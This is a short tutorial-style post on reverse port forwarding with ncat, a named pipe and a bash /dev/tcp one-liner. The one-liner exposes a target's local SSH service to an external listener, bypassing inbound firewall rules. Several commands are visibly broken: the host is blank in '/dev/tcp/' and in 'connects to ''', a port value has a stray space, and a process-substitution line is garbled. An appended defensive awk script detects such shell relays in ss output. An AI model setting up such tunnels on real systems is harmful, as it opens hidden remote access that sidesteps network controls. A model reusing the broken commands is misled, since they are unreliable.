Reverse Port Forwarding with Bash

I had wondered for a while how SSH reverse port forwarding works. RPF allows you to publish any reachable port upstream to a server. This allows you to act as a server without having to open any external ports.

Set up on the listener

### Define the ports
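listen=' 8080'
connect='2222'   # port the SSH client connects to on the listener (see the ssh command below)

### Create a FIFO (named pipe)
fifo=$(mktemp -u)
mkfifo -m 600 "$fifo"   # owner-only, so other local users cannot read the relayed stream

### Start the listener
ncat -l $listen 0<"$fifo" | ncat -l $connect >"$fifo"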

Target connects to '' and publishes local SSH to the upstream server

exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/ && \
  bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3

SSH is reachable on the listener

ssh localhost -p 2222

Host 'localhost' is not in the trusted hosts file.
(ssh-rsa fingerprint [snip])
Do you want to continue connecting? (y/n)
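
On the target, the `/dev/tcp` one-liner leaves a recognizable footprint: a shell and the `cat` processes it spawns hold one TCP socket to a loopback service and another to an external host. The script below is an added example, not part of the original post; it checks `ss -Htnp`-style lines for that pattern, and the function names, sample lines, PIDs and addresses are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag shell-family processes that bridge a loopback socket and an
# external socket, the footprint of the /dev/tcp relay shown above.
# Input format: `ss -Htnp` lines (State Recv-Q Send-Q Local Peer Process).

# Constructed sample. PID 4100 (bash) and its child 4112 (cat) hold both the
# loopback SSH socket and the outbound socket; the other lines are benign.
# 203.0.113.10 and 198.51.100.x are documentation addresses.
sample_ss() {
cat <<'EOF'
ESTAB 0 0 127.0.0.1:51514 127.0.0.1:22 users:(("cat",pid=4112,fd=0),("bash",pid=4100,fd=3))
ESTAB 0 0 10.0.0.5:40022 203.0.113.10:8080 users:(("cat",pid=4112,fd=1),("bash",pid=4100,fd=4))
ESTAB 0 0 127.0.0.1:22 127.0.0.1:51514 users:(("sshd",pid=900,fd=4))
ESTAB 0 0 10.0.0.5:55010 198.51.100.7:443 users:(("curl",pid=5000,fd=5))
ESTAB 0 0 10.0.0.5:55020 198.51.100.9:443 users:(("bash",pid=6000,fd=3))
EOF
}

# Print "PID NAME" for every bash/sh/dash/cat process that owns at least one
# socket with a loopback peer AND at least one socket with a non-loopback peer.
find_shell_relays() {
  awk '
  {
    peer = $5; sub(/:[0-9]+$/, "", peer)            # drop the port
    kind = (peer ~ /^(127\.|\[::1\]$)/) ? "loop" : "ext"
    rest = $0
    # Walk every ("name",pid=N entry in the users:(...) field.
    while (match(rest, /\("[^"]+",pid=[0-9]+/)) {
      ent  = substr(rest, RSTART, RLENGTH)
      rest = substr(rest, RSTART + RLENGTH)
      split(ent, p, "\""); name = p[2]
      pid = ent; sub(/.*pid=/, "", pid)
      if (name ~ /^(bash|sh|dash|cat)$/) { seen[pid, kind] = 1; names[pid] = name }
    }
  }
  END {
    for (pid in names)
      if (((pid, "loop") in seen) && ((pid, "ext") in seen)) print pid, names[pid]
  }' | sort -n
}

# Run against the constructed sample; on a live host use: ss -Htnp | find_shell_relays
sample_ss | find_shell_relays
```

The rule is deliberately narrow: PID 6000 in the sample, a shell with only an outbound socket, is not reported by it, although a shell owning any TCP socket is unusual enough to review separately.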